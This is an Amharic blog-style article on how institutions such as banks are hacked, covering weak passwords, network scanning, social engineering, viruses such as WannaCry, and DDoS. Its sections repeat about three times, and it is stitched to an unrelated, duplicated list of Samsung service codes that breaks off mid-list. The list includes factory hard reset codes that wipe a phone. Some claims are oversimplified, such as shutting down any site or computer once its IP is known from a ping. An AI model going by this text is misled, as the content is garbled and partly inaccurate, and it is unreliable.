በዚሕ ጽሑፍ ውስጥ ስለተቋማት የመረጃ ሰበራ ሂደት በቅደም ተከተል ይቀርባል። ከዚያ በፊት
ግን እኛ መረጃ ሰባሪዎች አይደለንም ለጠቅላላ እውቀትና ለትምህርት ያክል ነው የምንጽፈው
ለማለት እንወዳለን። ሰላም።
*
የባንክና የንግድ ተቋማት እንዲሁም የማኅበራዊ ወታደራዊ ተቋማት ወዘተ የሚበረበሩት በተለያየ
ምክንያት ነው።
*አንደኛውና ዋነኛው የመረጃ አያያዝን አለማጠንከርና አለማዘመን ናቸው። እነዚሕ ነገሮች
በመረጃ አያያዝ እጅግ ወሳኝ ናቸው። ለምሳሌ ከይለፍቃል/PassWord/ ጀምሮ አለማጠንከር
እነደምሳሌ ይነሳል። alemu1234, 0934....43, abcd1234, love143, password1,
...ወዘተ የሚሉ የይለፍ ቃሎች በሀከሮች ለመገኘት የደቂቃ ጊዜ አይወስድባቸውም። ፓስወርድ
ሰበራን በተለያየ መልኩ የሚሰራ ሲሆን ከነዚሕ ውስጥ የሚታወቀው፡ ብሩት ፎርስ አታክ ወይም
ዲክሽነሪ አታክ የሚባለው ነው። ይሕም የተለያዩ ዓለም ላይ አሉ የተባሉ ስሞችን እያስገባ
ይፈልጋል። የይለፍ ቃሉ ከጠነከረ ለምሳሌ $@78S#Fm&%=, ዓይነት ፓስወርዶች ሊሰበሩ
አይችሉም/99.5% ጠንካራ ናቸው/። በስፋት ደግሞ በሌላ ጊዜ እንመጣበታለን።
*የኔትዎርክ ደሕንነት፡ የኔትዎርክ እውቀት በሀከሮች ዘንድ መሰረታዊ ነው። የኔትዎርክ
አቀማመጥ ፡ዝርግታ ፡ደሕንነት ...ወዘተ ይቃኛሉ። ዘዴው የኔትዎርክ ኮማንድ እውቀት/TCP/IP/
UDP..... Network protocol, Network topography, Mac address & Port scan,
Ip Address searching...ወዘተ የሚባሉ መሠረታዊ ነገሮች ለመረጃ ሰባሪዎች ወሳኝ
ናቸውና ስለኔትወርቅ ጠንቅቀው ያውቃሉ። ምክንያቱም እነርሱም በኔትወርክ እንጂ በአካል
ተገኝተው መረጃና ሌሎችን ነገሮች አያደርጉምና። ለምሳሌ ስለ አንድ ድርጅት ለማወቅ ለማወቅ
መረጃን online ይሰበሰባ። አንድ ሰው ስለ google ለማወቅ አድራሻ ቢፈልግና ሰርበሩን
ባያውቀው በኔትወርክ ping www.google.com ብሎ cmd ላይ ፒንግ በማድረግ ስለ ip
address, ttl. Time bytes በቀላሉ ማወቅ ይችላለ። ቀጣዩን ደግሞ እንዲሕ እያደረገ
ይጓዛለሁ። ሀከሮችም እንደዛው ነው። በነገራችን ላይ google ላይ ከአራት በላይ ፒንግ
ካደረጋችሁ ስለላ መስሎት ሊዘገጋባችሁ ይችላል። ማሳሰቢያ ናት / ስለዚሕ ደህንነታቸው
ባልተጠበቀ ኔትዎርኮች ላይ ሀከሮች ይረማመዱባቸዋል።
*የፕሮግራሚንግ ችሎታ : በፕሮግራሚንግ እውቀት አብዛው ብላክ ሃከሮችና የሶፍትዌር
መገንባት ችሎታ ያላቸው ፕሮግራመሮች የሚጠቀሙበት ሲሆን እነዚሕም አንቲ ባይረሶችን
ለማለፍ, ባይረስ ለመስራት, ኪሎገር ለመስራት, መረጃን ለመሠብሰብ, የይለፍ ቃል መሠለል,
አጠቃላይ የሲስተሙን ደካማ ጎን ለማግኘት ይጠቀሙበታል።
*ሌላው የሶሻል ኢንጅነሪንግ ዘርፍ ነው። ሶሻል ኢንጂነሪንግ/ማኅበራዊ ምሕንድስና/ የሚባለው
ቀላል ቴክኒኮችን/ምርመራ/ በመጠቀም ለመረጃ ሰበራ መዘጋጀት ነው። ከነዚህም አንዱና
ታዋቂው ፊሺንግ አታክ/አታሎ ማጥቃት/ የሚባለው ነው። ለምሳሌ ዳታ ልላክልሕ ኤሜልህን
ስጠኝ ያለ ሰው፡ ኤሜል ከሰጠኸው በኋላ ፓስወርዱን ለማግኘት ሌሎች ዘዴዎችን በመጠቀም
ያገኘዋል። በዩኒበርስቲው የግሬድ ውጤት ማሳወቂያ ቢሮ ሄደው "ፓስወርዱን ረሳኩት
ይስተካከልልኝ" ብሎ ሄዶ admin pageን ከነ Ip address ጋር በማየት ውጤታቸውን ከD
ወደ A+ የሚቀይሩ ብልጥ ተማሪዎች አይጠፋም።ip ና admin pageን ካገኙት username
ና password በሌላ ዘዴ ያገኙታል ማለት ነው።
*ባይረስ፡ ባይረስ ሌላኛው የኮምፒውተር መጥለፊያ ዘዴ ነው።ይሕም የሚሆነው ከፍተኛ
የፕሮግራም ኮድ የመጻፍ ችሎታ ባላቸው ሀከሮች ነው። የኮምፕዩተር ዳታ አቀማመጥና
አቀናባበር/automata & architecture/ የማወቅ ግዴታን ይጠይቃል። የባይረስ አባት
የሚባለው የሃንጋሪ ሰው ጆን ኒማን በ1949 ራሱን ችሎ ኮምፕዩተር ላይ በማራባት ወደ ሌሎች
ኮምፒዩተሮች መሰግሰግ የሚችል ፕሮግራም ከፃፈ ወዲሕ ሀከሮች በተለያየ መልኩ ባይረስ
ይጠቀማሉ። ባይረሶች/ፕሮግራሞች/ የተለያየ ተልዕኮ ይዘው ወደ ኮምፒውተር ይላካሉ።
መሠለል፡ መረጃ መዝረፍ፡ መረጃ መደበቅና ማጥፋት፡ ኮምፕዩተርና የተለያዩ በኮምፒውተር
ስርዓት የሚሰሩ ማሽኖችን ከጥቅም ውጭ ማድረግ፡ ሊሆን ይችላል።
በይዘታቸው ዋርም/ራንሶርም፡ ትሮጃን፡ ማሊሸስ ወዘተ አየተባሉ ይሄዳሉ በሌላ ጌዜ ራሱን ችሎ
ካላየነው በጣም ሰፊ ነው።
*የኮምፒውተር ቀጥታ ጥቃት: እጅግ ብዙ ዓይነት የኮምፒውተር ቀጥታ ጥቃቶች ሲኖሩ ታዋቂው
ግን ዲዶስ አታክ/Denial of service attack/ ይባላል። ለምሳሌ እኔ እዚሕ ቁጭ ብየ እናንተ
online/ኢንተርኔት እየተጠቀማችሁ/ እንደሆነ ካወቅሁ ወይም ዌብሳይት ካላችሁ ፡
ኮምፕዩተራችሁን ሆነ ዌብሳይት/ድኅረ ገጻችሁን/ ሪሞትሊ መዝጋት/shutdown/ ማድረግ
እችላለሁ። ነገሩ ከባድ አደለም ቀላል ነው። የናንተን አይ ፒ/IP Adress/ ፒንግ አድርጌ
ማወቅ ይጠበቅብኛል። ወይም ዌብሳታችሁን ለመዝጋት አገናኝ አድራሻ/IP Adress/ ካወቅሁ
የቀረዉ ስራ ከባድ አደለም። ምክንያቱም ዳታ በማሳደግና በማሳነስ የመቀበል ፕሮቶኮሉ ከተዛባ
ዌብሳይታቹሕ አይሰራም። በዚሕ/Temporarily Unavailable/ ብሎ ይዘጋል ማለት
ነው።ዲዶስ DDos attack በጣም ቀላል ሲሆን ጥፋቱ እጅግ ከባድ ነው።
*
ስለ ሳይበሩ ዓለም እነዚሕና ሌሎች መንገዶችን በመጠቀም ተቋማትን ያጠቃሉ። ዛሬ ይሕን
ያክል ካልን ሀከሮች የተለያዩ ዘዴዎችን በመጠቀም ተቋማትን እንዴት እንደሚዘርፉና እንዳይያዙ
ከፎረንሲክ ምርመራ ነፃ ለመሆን ምን እንደሚጠቀሙ እንያለን። ሀከሮች የሚጠቀሙባቸው
አስራ ሶስት ያህል መንገዶች እናቀርባለን
ባንክና ሌሎች ተቋማት እንዴት ሃክ/hack/
ይደረጋሉ።
*
ሰላም ጤና ይስጥልን ውድ የገጻችን ተከታታዮች እንዴት ናችሁ። በዚሕ ተከታታይ ክፍል ሰፋ
አድርገን ስለ ሳይበሩ ዓለም/መረጃ ብርበራና ዘረፋ/ በሰፊው እንመለከታለን።
በአሁኑ ወቅት ዓለም በዲጂታል ሲስተም ወደ አንድ ቤተሰብ ብትመጣም የመረጃ ስርቆት/ሳይበር
ወንጀል/ ግን ራስ ምታት ከሆነባት ብዙ ዓመታትን ተቆጠረዋል። ከትንሽ እስከ ትልቅ፡ ከግል
እስከ መንግስት ተቋማትና ከክልል እስከ ሀገር ብሎም አሕጉር ድረስ ኢንተርኔት እስከተዘረጋበት
ቢሮ ሳይበር ዓለምን እየረበሸ ይገኛል። በቅርቡ ባሳለፍነው ሐምሌ ወር መጨረሻ እንኳ ሩሲያ
በታሪኳ አይታው የማታውቅ የሳይበር ጥቃት ደርሶ ወደ 8GB የሚሆን የወታደራዊና የሀገራዊ
ደሕንነት መረጃዎች ዘረፋ ጥቃት ደርሶባታል። ባለፉት ሁለት ዓመት ውስጥ እንኳ 'ዋና
ክራይ' ...ትርጓሜው አለቅሳለሁ እንደማለት ነው.....የተባለው በሀከሮች የተሰራው
የኮምፒውተር ባይረስ አለምን ኢትዮጵያን ጨምሮ 150 ሀገሮችንእንዴት እንደመታ የቅርብ ጊዜ
ትውስታ ነው። ይሕ ባይረስ ብር ከተሰጠከው ብቻ ነው ከኮምፒውተር ሲስተም የሚወጣው።
ባይረሱ የ200,000 ሰዎችን ቤት ሲያንኳኳ የ300,000 ኮምፒውተሮችን ደግሞ
አጥቅቷል።ሲወጣም እጅግ በረቀቀ መልኩ ራሱን በመግደል/Self Killing/ ስለነበር፡
ስለማንነቱ/ፎረንሲክ ምርመራ/ ዓለም እስካሁን አልደረሰበትም። ሰሜን ኮርያ ግን በጉዳዩ
ተጠርጥራ ነበር።ያደረሰው ኪሳራም በኮምፒውተር እስከ 600$ የሚጠይቅና የታይዋንን
የኤሌክትሮኒክ ፋብሪካ ሙሉ በሙሉ እንዲዘጋ በማድረግ ባጠቃላይ 4ቢሊዮን የአሜሪካ ዶላር
ጥፋት አድርሷል፡ መዝብሯል።
በዚሕ ጽሑፍ ውስጥ ስለተቋማት የመረጃ ሰበራ ሂደት በቅደም ተከተል ይቀርባል። ከዚያ በፊት
ግን እኛ መረጃ ሰባሪዎች አይደለንም ለጠቅላላ እውቀትና ለትምህርት ያክል ነው የምንጽፈው
ለማለት እንወዳለን። ሰላም።
*
የባንክና የንግድ ተቋማት እንዲሁም የማኅበራዊ ወታደራዊ ተቋማት ወዘተ የሚበረበሩት በተለያየ
ምክንያት ነው።
*አንደኛውና ዋነኛው የመረጃ አያያዝን አለማጠንከርና አለማዘመን ናቸው። እነዚሕ ነገሮች
በመረጃ አያያዝ እጅግ ወሳኝ ናቸው። ለምሳሌ ከይለፍቃል/PassWord/ ጀምሮ አለማጠንከር
እነደምሳሌ ይነሳል። alemu1234, 0934....43, abcd1234, love143, password1,
...ወዘተ የሚሉ የይለፍ ቃሎች በሀከሮች ለመገኘት የደቂቃ ጊዜ አይወስድባቸውም። ፓስወርድ
ሰበራን በተለያየ መልኩ የሚሰራ ሲሆን ከነዚሕ ውስጥ የሚታወቀው፡ ብሩት ፎርስ አታክ ወይም
ዲክሽነሪ አታክ የሚባለው ነው። ይሕም የተለያዩ ዓለም ላይ አሉ የተባሉ ስሞችን እያስገባ
ይፈልጋል። የይለፍ ቃሉ ከጠነከረ ለምሳሌ $@78S#Fm&%=, ዓይነት ፓስወርዶች ሊሰበሩ
አይችሉም/99.5% ጠንካራ ናቸው/። በስፋት ደግሞ በሌላ ጊዜ እንመጣበታለን።
*የኔትዎርክ ደሕንነት፡ የኔትዎርክ እውቀት በሀከሮች ዘንድ መሰረታዊ ነው። የኔትዎርክ
አቀማመጥ ፡ዝርግታ ፡ደሕንነት ...ወዘተ ይቃኛሉ። ዘዴው የኔትዎርክ ኮማንድ እውቀት/TCP/IP/
UDP..... Network protocol, Network topography, Mac address & Port scan,
Ip Address searching...ወዘተ የሚባሉ መሠረታዊ ነገሮች ለመረጃ ሰባሪዎች ወሳኝ
ናቸውና ስለኔትወርቅ ጠንቅቀው ያውቃሉ። ምክንያቱም እነርሱም በኔትወርክ እንጂ በአካል
ተገኝተው መረጃና ሌሎችን ነገሮች አያደርጉምና። ለምሳሌ ስለ አንድ ድርጅት ለማወቅ ለማወቅ
መረጃን online ይሰበሰባ። አንድ ሰው ስለ google ለማወቅ አድራሻ ቢፈልግና ሰርበሩን
ባያውቀው በኔትወርክ ping www.google.com ብሎ cmd ላይ ፒንግ በማድረግ ስለ ip
address, ttl. Time bytes በቀላሉ ማወቅ ይችላለ። ቀጣዩን ደግሞ እንዲሕ እያደረገ
ይጓዛለሁ። ሀከሮችም እንደዛው ነው። በነገራችን ላይ google ላይ ከአራት በላይ ፒንግ
ካደረጋችሁ ስለላ መስሎት ሊዘገጋባችሁ ይችላል። ማሳሰቢያ ናት / ስለዚሕ ደህንነታቸው
ባልተጠበቀ ኔትዎርኮች ላይ ሀከሮች ይረማመዱባቸዋል።
*የፕሮግራሚንግ ችሎታ : በፕሮግራሚንግ እውቀት አብዛው ብላክ ሃከሮችና የሶፍትዌር
መገንባት ችሎታ ያላቸው ፕሮግራመሮች የሚጠቀሙበት ሲሆን እነዚሕም አንቲ ባይረሶችን
ለማለፍ, ባይረስ ለመስራት, ኪሎገር ለመስራት, መረጃን ለመሠብሰብ, የይለፍ ቃል መሠለል,
አጠቃላይ የሲስተሙን ደካማ ጎን ለማግኘት ይጠቀሙበታል።
*ሌላው የሶሻል ኢንጅነሪንግ ዘርፍ ነው። ሶሻል ኢንጂነሪንግ/ማኅበራዊ ምሕንድስና/ የሚባለው
ቀላል ቴክኒኮችን/ምርመራ/ በመጠቀም ለመረጃ ሰበራ መዘጋጀት ነው። ከነዚህም አንዱና
ታዋቂው ፊሺንግ አታክ/አታሎ ማጥቃት/ የሚባለው ነው። ለምሳሌ ዳታ ልላክልሕ ኤሜልህን
ስጠኝ ያለ ሰው፡ ኤሜል ከሰጠኸው በኋላ ፓስወርዱን ለማግኘት ሌሎች ዘዴዎችን በመጠቀም
ያገኘዋል። በዩኒበርስቲው የግሬድ ውጤት ማሳወቂያ ቢሮ ሄደው "ፓስወርዱን ረሳኩት
ይስተካከልልኝ" ብሎ ሄዶ admin pageን ከነ Ip address ጋር በማየት ውጤታቸውን ከD
ወደ A+ የሚቀይሩ ብልጥ ተማሪዎች አይጠፋም።ip ና admin pageን ካገኙት username
ና password በሌላ ዘዴ ያገኙታል ማለት ነው።
*ባይረስ፡ ባይረስ ሌላኛው የኮምፒውተር መጥለፊያ ዘዴ ነው።ይሕም የሚሆነው ከፍተኛ
የፕሮግራም ኮድ የመጻፍ ችሎታ ባላቸው ሀከሮች ነው። የኮምፕዩተር ዳታ አቀማመጥና
አቀናባበር/automata & architecture/ የማወቅ ግዴታን ይጠይቃል። የባይረስ አባት
የሚባለው የሃንጋሪ ሰው ጆን ኒማን በ1949 ራሱን ችሎ ኮምፕዩተር ላይ በማራባት ወደ ሌሎች
ኮምፒዩተሮች መሰግሰግ የሚችል ፕሮግራም ከፃፈ ወዲሕ ሀከሮች በተለያየ መልኩ ባይረስ
ይጠቀማሉ። ባይረሶች/ፕሮግራሞች/ የተለያየ ተልዕኮ ይዘው ወደ ኮምፒውተር ይላካሉ።
መሠለል፡ መረጃ መዝረፍ፡ መረጃ መደበቅና ማጥፋት፡ ኮምፕዩተርና የተለያዩ በኮምፒውተር
ስርዓት የሚሰሩ ማሽኖችን ከጥቅም ውጭ ማድረግ፡ ሊሆን ይችላል።
በይዘታቸው ዋርም/ራንሶርም፡ ትሮጃን፡ ማሊሸስ ወዘተ አየተባሉ ይሄዳሉ በሌላ ጌዜ ራሱን ችሎ
ካላየነው በጣም ሰፊ ነው።
*የኮምፒውተር ቀጥታ ጥቃት: እጅግ ብዙ ዓይነት የኮምፒውተር ቀጥታ ጥቃቶች ሲኖሩ ታዋቂው
ግን ዲዶስ አታክ/Denial of service attack/ ይባላል። ለምሳሌ እኔ እዚሕ ቁጭ ብየ እናንተ
online/ኢንተርኔት እየተጠቀማችሁ/ እንደሆነ ካወቅሁ ወይም ዌብሳይት ካላችሁ ፡
ኮምፕዩተራችሁን ሆነ ዌብሳይት/ድኅረ ገጻችሁን/ ሪሞትሊ መዝጋት/shutdown/ ማድረግ
እችላለሁ። ነገሩ ከባድ አደለም ቀላል ነው። የናንተን አይ ፒ/IP Adress/ ፒንግ አድርጌ
ማወቅ ይጠበቅብኛል። ወይም ዌብሳታችሁን ለመዝጋት አገናኝ አድራሻ/IP Adress/ ካወቅሁ
የቀረዉ ስራ ከባድ አደለም። ምክንያቱም ዳታ በማሳደግና በማሳነስ የመቀበል ፕሮቶኮሉ ከተዛባ
ዌብሳይታቹሕ አይሰራም። በዚሕ/Temporarily Unavailable/ ብሎ ይዘጋል ማለት
ነው።ዲዶስ DDos attack በጣም ቀላል ሲሆን ጥፋቱ እጅግ ከባድ ነው።
*
ስለ ሳይበሩ ዓለም እነዚሕና ሌሎች መንገዶችን በመጠቀም ተቋማትን ያጠቃሉ። ዛሬ ይሕን
ያክል ካልን ሀከሮች የተለያዩ ዘዴዎችን በመጠቀም ተቋማትን እንዴት እንደሚዘርፉና እንዳይያዙ
ከፎረንሲክ ምርመራ ነፃ ለመሆን ምን እንደሚጠቀሙ እንያለን። ሀከሮች የሚጠቀሙባቸው
አስራ ሶስት ያህል መንገዶች እናቀርባለን
*
ሰላም ጤና ይስጥልን ውድ የገጻችን ተከታታዮች እንዴት ናችሁ። በዚሕ ተከታታይ ክፍል ሰፋ
አድርገን ስለ ሳይበሩ ዓለም/መረጃ ብርበራና ዘረፋ/ በሰፊው እንመለከታለን።
በአሁኑ ወቅት ዓለም በዲጂታል ሲስተም ወደ አንድ ቤተሰብ ብትመጣም የመረጃ ስርቆት/ሳይበር
ወንጀል/ ግን ራስ ምታት ከሆነባት ብዙ ዓመታትን ተቆጠረዋል። ከትንሽ እስከ ትልቅ፡ ከግል
እስከ መንግስት ተቋማትና ከክልል እስከ ሀገር ብሎም አሕጉር ድረስ ኢንተርኔት እስከተዘረጋበት
ቢሮ ሳይበር ዓለምን እየረበሸ ይገኛል። በቅርቡ ባሳለፍነው ሐምሌ ወር መጨረሻ እንኳ ሩሲያ
በታሪኳ አይታው የማታውቅ የሳይበር ጥቃት ደርሶ ወደ 8GB የሚሆን የወታደራዊና የሀገራዊ
ደሕንነት መረጃዎች ዘረፋ ጥቃት ደርሶባታል። ባለፉት ሁለት ዓመት ውስጥ እንኳ 'ዋና
ክራይ' ...ትርጓሜው አለቅሳለሁ እንደማለት ነው.....የተባለው በሀከሮች የተሰራው
የኮምፒውተር ባይረስ አለምን ኢትዮጵያን ጨምሮ 150 ሀገሮችንእንዴት እንደመታ የቅርብ ጊዜ
ትውስታ ነው። ይሕ ባይረስ ብር ከተሰጠከው ብቻ ነው ከኮምፒውተር ሲስተም የሚወጣው።
ባይረሱ የ200,000 ሰዎችን ቤት ሲያንኳኳ የ300,000 ኮምፒውተሮችን ደግሞ
አጥቅቷል።ሲወጣም እጅግ በረቀቀ መልኩ ራሱን በመግደል/Self Killing/ ስለነበር፡
ስለማንነቱ/ፎረንሲክ ምርመራ/ ዓለም እስካሁን አልደረሰበትም። ሰሜን ኮርያ ግን በጉዳዩ
ተጠርጥራ ነበር።ያደረሰው ኪሳራም በኮምፒውተር እስከ 600$ የሚጠይቅና የታይዋንን
የኤሌክትሮኒክ ፋብሪካ ሙሉ በሙሉ እንዲዘጋ በማድረግ ባጠቃላይ 4ቢሊዮን የአሜሪካ ዶላር
ጥፋት አድርሷል፡ መዝብሯል።
በዚሕ ጽሑፍ ውስጥ ስለተቋማት የመረጃ ሰበራ ሂደት በቅደም ተከተል ይቀርባል። ከዚያ በፊት
ግን እኛ መረጃ ሰባሪዎች አይደለንም ለጠቅላላ እውቀትና ለትምህርት ያክል ነው የምንጽፈው
ለማለት እንወዳለን። ሰላም።
*
የባንክና የንግድ ተቋማት እንዲሁም የማኅበራዊ ወታደራዊ ተቋማት ወዘተ የሚበረበሩት በተለያየ
ምክንያት ነው።
*አንደኛውና ዋነኛው የመረጃ አያያዝን አለማጠንከርና አለማዘመን ናቸው። እነዚሕ ነገሮች
በመረጃ አያያዝ እጅግ ወሳኝ ናቸው። ለምሳሌ ከይለፍቃል/PassWord/ ጀምሮ አለማጠንከር
እነደምሳሌ ይነሳል። alemu1234, 0934....43, abcd1234, love143, password1,
...ወዘተ የሚሉ የይለፍ ቃሎች በሀከሮች ለመገኘት የደቂቃ ጊዜ አይወስድባቸውም። ፓስወርድ
ሰበራን በተለያየ መልኩ የሚሰራ ሲሆን ከነዚሕ ውስጥ የሚታወቀው፡ ብሩት ፎርስ አታክ ወይም
ዲክሽነሪ አታክ የሚባለው ነው። ይሕም የተለያዩ ዓለም ላይ አሉ የተባሉ ስሞችን እያስገባ
ይፈልጋል። የይለፍ ቃሉ ከጠነከረ ለምሳሌ $@78S#Fm&%=, ዓይነት ፓስወርዶች ሊሰበሩ
አይችሉም/99.5% ጠንካራ ናቸው/። በስፋት ደግሞ በሌላ ጊዜ እንመጣበታለን።
*የኔትዎርክ ደሕንነት፡ የኔትዎርክ እውቀት በሀከሮች ዘንድ መሰረታዊ ነው። የኔትዎርክ
አቀማመጥ ፡ዝርግታ ፡ደሕንነት ...ወዘተ ይቃኛሉ። ዘዴው የኔትዎርክ ኮማንድ እውቀት/TCP/IP/
UDP..... Network protocol, Network topography, Mac address & Port scan,
Ip Address searching...ወዘተ የሚባሉ መሠረታዊ ነገሮች ለመረጃ ሰባሪዎች ወሳኝ
ናቸውና ስለኔትወርቅ ጠንቅቀው ያውቃሉ። ምክንያቱም እነርሱም በኔትወርክ እንጂ በአካል
ተገኝተው መረጃና ሌሎችን ነገሮች አያደርጉምና። ለምሳሌ ስለ አንድ ድርጅት ለማወቅ ለማወቅ
መረጃን online ይሰበሰባ። አንድ ሰው ስለ google ለማወቅ አድራሻ ቢፈልግና ሰርበሩን
ባያውቀው በኔትወርክ ping www.google.com ብሎ cmd ላይ ፒንግ በማድረግ ስለ ip
address, ttl. Time bytes በቀላሉ ማወቅ ይችላለ። ቀጣዩን ደግሞ እንዲሕ እያደረገ
ይጓዛለሁ። ሀከሮችም እንደዛው ነው። በነገራችን ላይ google ላይ ከአራት በላይ ፒንግ
ካደረጋችሁ ስለላ መስሎት ሊዘገጋባችሁ ይችላል። ማሳሰቢያ ናት / ስለዚሕ ደህንነታቸው
ባልተጠበቀ ኔትዎርኮች ላይ ሀከሮች ይረማመዱባቸዋል።
*የፕሮግራሚንግ ችሎታ : በፕሮግራሚንግ እውቀት አብዛው ብላክ ሃከሮችና የሶፍትዌር
መገንባት ችሎታ ያላቸው ፕሮግራመሮች የሚጠቀሙበት ሲሆን እነዚሕም አንቲ ባይረሶችን
ለማለፍ, ባይረስ ለመስራት, ኪሎገር ለመስራት, መረጃን ለመሠብሰብ, የይለፍ ቃል መሠለል,
አጠቃላይ የሲስተሙን ደካማ ጎን ለማግኘት ይጠቀሙበታል።
*ሌላው የሶሻል ኢንጅነሪንግ ዘርፍ ነው። ሶሻል ኢንጂነሪንግ/ማኅበራዊ ምሕንድስና/ የሚባለው
ቀላል ቴክኒኮችን/ምርመራ/ በመጠቀም ለመረጃ ሰበራ መዘጋጀት ነው። ከነዚህም አንዱና
ታዋቂው ፊሺንግ አታክ/አታሎ ማጥቃት/ የሚባለው ነው። ለምሳሌ ዳታ ልላክልሕ ኤሜልህን
ስጠኝ ያለ ሰው፡ ኤሜል ከሰጠኸው በኋላ ፓስወርዱን ለማግኘት ሌሎች ዘዴዎችን በመጠቀም
ያገኘዋል። በዩኒበርስቲው የግሬድ ውጤት ማሳወቂያ ቢሮ ሄደው "ፓስወርዱን ረሳኩት
ይስተካከልልኝ" ብሎ ሄዶ admin pageን ከነ Ip address ጋር በማየት ውጤታቸውን ከD
ወደ A+ የሚቀይሩ ብልጥ ተማሪዎች አይጠፋም።ip ና admin pageን ካገኙት username
ና password በሌላ ዘዴ ያገኙታል ማለት ነው።
*ባይረስ፡ ባይረስ ሌላኛው የኮምፒውተር መጥለፊያ ዘዴ ነው።ይሕም የሚሆነው ከፍተኛ
የፕሮግራም ኮድ የመጻፍ ችሎታ ባላቸው ሀከሮች ነው። የኮምፕዩተር ዳታ አቀማመጥና
አቀናባበር/automata & architecture/ የማወቅ ግዴታን ይጠይቃል። የባይረስ አባት
የሚባለው የሃንጋሪ ሰው ጆን ኒማን በ1949 ራሱን ችሎ ኮምፕዩተር ላይ በማራባት ወደ ሌሎች
ኮምፒዩተሮች መሰግሰግ የሚችል ፕሮግራም ከፃፈ ወዲሕ ሀከሮች በተለያየ መልኩ ባይረስ
ይጠቀማሉ። ባይረሶች/ፕሮግራሞች/ የተለያየ ተልዕኮ ይዘው ወደ ኮምፒውተር ይላካሉ።
መሠለል፡ መረጃ መዝረፍ፡ መረጃ መደበቅና ማጥፋት፡ ኮምፕዩተርና የተለያዩ በኮምፒውተር
ስርዓት የሚሰሩ ማሽኖችን ከጥቅም ውጭ ማድረግ፡ ሊሆን ይችላል።
በይዘታቸው ዋርም/ራንሶርም፡ ትሮጃን፡ ማሊሸስ ወዘተ አየተባሉ ይሄዳሉ በሌላ ጌዜ ራሱን ችሎ
ካላየነው በጣም ሰፊ ነው።
*የኮምፒውተር ቀጥታ ጥቃት: እጅግ ብዙ ዓይነት የኮምፒውተር ቀጥታ ጥቃቶች ሲኖሩ ታዋቂው
ግን ዲዶስ አታክ/Denial of service attack/ ይባላል። ለምሳሌ እኔ እዚሕ ቁጭ ብየ እናንተ
online/ኢንተርኔት እየተጠቀማችሁ/ እንደሆነ ካወቅሁ ወይም ዌብሳይት ካላችሁ ፡
ኮምፕዩተራችሁን ሆነ ዌብሳይት/ድኅረ ገጻችሁን/ ሪሞትሊ መዝጋት/shutdown/ ማድረግ
እችላለሁ። ነገሩ ከባድ አደለም ቀላል ነው። የናንተን አይ ፒ/IP Adress/ ፒንግ አድርጌ
ማወቅ ይጠበቅብኛል። ወይም ዌብሳታችሁን ለመዝጋት አገናኝ አድራሻ/IP Adress/ ካወቅሁ
የቀረዉ ስራ ከባድ አደለም። ምክንያቱም ዳታ በማሳደግና በማሳነስ የመቀበል ፕሮቶኮሉ ከተዛባ
ዌብሳይታቹሕ አይሰራም። በዚሕ/Temporarily Unavailable/ ብሎ ይዘጋል ማለት
ነው።ዲዶስ DDos attack በጣም ቀላል ሲሆን ጥፋቱ እጅግ ከባድ ነው።
*
ስለ ሳይበሩ ዓለም እነዚሕና ሌሎች መንገዶችን በመጠቀም ተቋማትን ያጠቃሉ። ዛሬ ይሕን
ያክል ካልን ሀከሮች የተለያዩ ዘዴዎችን በመጠቀም ተቋማትን እንዴት እንደሚዘርፉና እንዳይያዙ
ከፎረንሲክ ምርመራ ነፃ ለመሆን ምን እንደሚጠቀሙ እንያለን። ሀከሮች የሚጠቀሙባቸው
አስራ ሶስት ያህል መንገዶች እናቀርባለን
SAMSUNG
*#06#
(Display IMEI number)
*#1234#
(Display current firmware)
*#*#4636#*#*
(Diagnostic and general settings mode)
*#*#7780#*#*
(Factory soft reset) or *#7780#
*2767*3855#
(Factory hard reset to ROM firmware default settings)
*2767*4387264636#*
(To display product code)
*#272*imei#*
(Display/change CSC code) or *#272*HHMM#*
*#*#1472365#*#*
(GPS test settings)
*#*#197328640#*#*
(Service mode main menu)
*#12580*369#
(SW & HW Info)
*#232337#
(Bluetooth Address)
*#232331#
(Bluetooth Test Mode)
*#232338#
(WLAN MAC Address)
*#0228#
(ADC Reading)
*#32489#
(Ciphering Info)
*#2263#
(RF Band Selection)
*#9090#
(Diagnostic ConfiguratioN)
*#7284#
(USB I2C Mode Control)
*#232339#
(WLAN Test Mode)
*#0842#
(Vibra Motor Test Mode)
*#0782#
(Real Time Clock Test)
*#0673#
(Audio Test Mode)
*#0*#
(General Test Mode)
*#872564#
(USB Logging Control)
*#4238378#
(GCF Configuration)
*#0283#
(Audio Loopback Control)
*#1575#
(GPS Control Menu)
*#3214789650#
(LBS Test Mode)
*#745#
(RIL Dump Menu)
*#03#
(NAND Flash S/N)
*#0589#
(Light Sensor Test Mode)
*#0588#
(Proximity Sensor Test Mode)
*#273283*255*3282*#
(Data Create Menu)
*#34971539#
(Camera Firmware Update)
*#526#
(WLAN Engineering Mode)
*#746#
(Debug Dump Menu)
*#9900#
(System Dump Mode)
*#44336#
(Sofware Version Info)
*#273283*255*663282*#
(Data Create SD Card)
*#3282*727336*#
(Data Usage Status)
*#7594#
(Remap Shutdown to End Call TSK)
*#0289#
(Melody Test Mode)
*#2663#
(TSP / TSK firmware update)
*#528#
(WLAN Engineering Mode)
*#7412365#
(Camera Firmware Menu) or *#*#34971539#*#*
*#80#
(Unknown)
*#07#
(Test History)
*#06#
(Display IMEI number)
*#1234#
(Display current firmware)
*#*#4636#*#*
(Diagnostic and general settings mode)
*#*#7780#*#*
(Factory soft reset) or *#7780#
*2767*3855#
(Factory hard reset to ROM firmware default settings)
*2767*4387264636#*
(To display product code)
*#272*imei#*
(Display/change CSC code) or *#272*HHMM#*
*#*#1472365#*#*
(GPS test settings)
*#*#197328640#*#*
(Service mode main menu)
*#12580*369#
(SW & HW Info)
*#232337#
(Bluetooth Address)
*#232331#
(Bluetooth Test Mode)
*#232338#
(WLAN MAC Address)
*#0228#
(ADC Reading)
*#32489#
(Ciphering Info)
*#2263#
(RF Band Selection)
*#9090#
(Diagnostic ConfiguratioN)
*#7284#
(USB I2C Mode Control)
*#232339#
(WLAN Test Mode)
*#0842#
(Vibra Motor Test Mode)
*#0782#
(Real Time Clock Test)
*#0673#
(Audio Test Mode)
*#0*#
(General Test Mode)
*#872564#
(USB Logging Control)
*#4238378#
(GCF Configuration)
*#0283#
(Audio Loopback Control)
*#1575#
(GPS Control Menu)
*#3214789650#
(LBS Test Mode)
*#745#
(RIL Dump Menu)
*#03#
(NAND Flash S/N)
*#0589#
(Light Sensor Test Mode)
*#0588#
(Proximity Sensor Test Mode)
*#273283*255*3282*#
(Data Create Menu)
*#34971539#
(Camera Firmware Update)
*#526#
